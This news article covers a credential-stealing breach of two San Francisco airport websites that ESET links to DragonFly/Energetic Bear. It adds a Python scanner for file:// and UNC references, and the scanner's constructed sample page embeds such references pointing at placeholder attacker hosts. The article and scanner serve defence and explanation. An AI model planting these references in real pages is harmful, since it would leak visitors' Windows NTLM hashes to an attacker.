A breach of the two websites operated by San Francisco International Airport may be the work of a hacker group known as Energetic Bear or DragonFly, cybersecurity firm ESET claims.
The hack of the SFOConnect.com and SFOConstruction.com websites took place in March this year. According to a data breach notification released by the airport’s officials, the attackers planted malicious code on the breached websites designed to steal “some users’ login credentials”.
“Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO,” the alert said.
The malicious code has already been removed from the affected websites. The airport has also forced a reset of all SFO-related email and network passwords.
While some reports suggested the involvement of Magecart gangs in the attack, ESET researchers say this breach has no link to any Magecart credential stealer.
Magecart is an umbrella term for malicious hacker groups who target online shopping websites to steal customer payment card information.
“The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials,” ESET said in a tweet.
According to the firm, the recent hack of SFO airport’s websites is in line with the TTPs of the DragonFly/Energetic Bear APT group.
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” the researchers claim.
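The mechanism ESET describes works because a page element whose address uses the file:// scheme or a UNC path (\\host\share) makes Internet Explorer on Windows try to fetch the resource over SMB, and Windows answers the remote host's authentication challenge with the logged-in user's name and NTLM hash. The scanner below, an added example and not code from ESET, SFO or the attackers, shows how a site operator can check the HTML actually served to visitors for such references. The sample page is constructed, and the host names and addresses in it are placeholders.

```python
"""Flag page references that would make a Windows browser authenticate
over SMB to a remote host (file:// URLs and UNC paths).

Added example for this article, not ESET's or SFO's code. SAMPLE_HTML is
constructed; its hosts (203.0.113.7, attacker-host.example.test) are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes whose value the browser fetches automatically or on click.
RESOURCE_ATTRS = {"src", "href", "data", "poster", "background", "action", "xlink:href"}
# url(...) inside CSS, either in a style attribute or a <style> block.
CSS_URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.IGNORECASE)
# UNC path: two backslashes, a host, then a separator. Protocol-relative
# URLs such as //cdn.example.test/x.js are HTTP(S) and are left alone.
UNC_RE = re.compile(r"^\\\\([A-Za-z0-9.\-]+)\\")


def classify_reference(value):
    """Return (kind, host) if `value` would trigger an SMB fetch, else None."""
    v = value.strip()
    m = UNC_RE.match(v)
    if m:
        return ("unc", m.group(1).lower())
    if v.lower().startswith("file:"):
        host = urlparse(v).netloc.lower()
        # file:///C:/... has no host and stays on the local machine.
        return ("file_url", host or "localhost")
    return None


class SmbReferenceScanner(HTMLParser):
    """Walk a page and record every reference that classify_reference flags."""

    def __init__(self):
        super().__init__()  # attribute values are entity-decoded for us
        self.findings = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
        for name, value in attrs:
            if value is None:
                continue
            if name in RESOURCE_ATTRS:
                self._record(tag, name, value)
            elif name == "style":
                for url in CSS_URL_RE.findall(value):
                    self._record(tag, "style", url)
            elif tag == "meta" and name == "content" and "url=" in value.lower():
                # <meta http-equiv="refresh" content="0; url=...">
                self._record(tag, "content", value[value.lower().find("url=") + 4:])

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            for url in CSS_URL_RE.findall(data):
                self._record("style", "url()", url)

    def _record(self, tag, attr, value):
        hit = classify_reference(value)
        if hit:
            kind, host = hit
            self.findings.append({"tag": tag, "attr": attr, "kind": kind,
                                  "host": host, "value": value.strip(),
                                  "line": self.getpos()[0]})


def scan_html(html):
    """Return the list of suspicious references found in `html`."""
    scanner = SmbReferenceScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def remote_hosts(findings):
    """Hosts the page would make visitors authenticate to, for blocking/alerting."""
    return sorted({f["host"] for f in findings if f["host"] != "localhost"})


# Constructed sample: two legitimate references and three injected ones.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="/static/site.css">
<style>body { background: url("file://203.0.113.7/share/bg.png"); }</style>
</head><body>
<img src="https://cdn.example.test/logo.png">
<img src="file://attacker-host.example.test/icons/blank.gif" width="1" height="1">
<a href="\\\\203.0.113.7\\docs\\schedule.pdf">Construction schedule</a>
<script src="/static/app.js"></script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"line {f['line']}: <{f['tag']} {f['attr']}> {f['kind']} -> {f['host']}")
    print("hosts:", remote_hosts(scan_html(SAMPLE_HTML)))
```

Run it against the HTML as fetched by a client outside the airport network, since that is where SFO's notice says the code was served; comparing the fetched page with the deployed source catches injected content of any kind, and this check adds the specific pattern ESET describes. On the network side, the standard mitigation is to block outbound SMB (TCP 445) at the perimeter so that a reference like the ones above cannot complete an authentication exchange with an external host.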
The DragonFly/Energetic Bear group has been active since at least 2010 and initially targeted organizations in the energy and industrial sectors, primarily in the Middle East, Turkey, and the US. However, in 2018 Kaspersky Lab reported that the hackers had expanded their target list to other types of organizations as well, such as companies in the aerospace and aviation sectors, software development, and banking.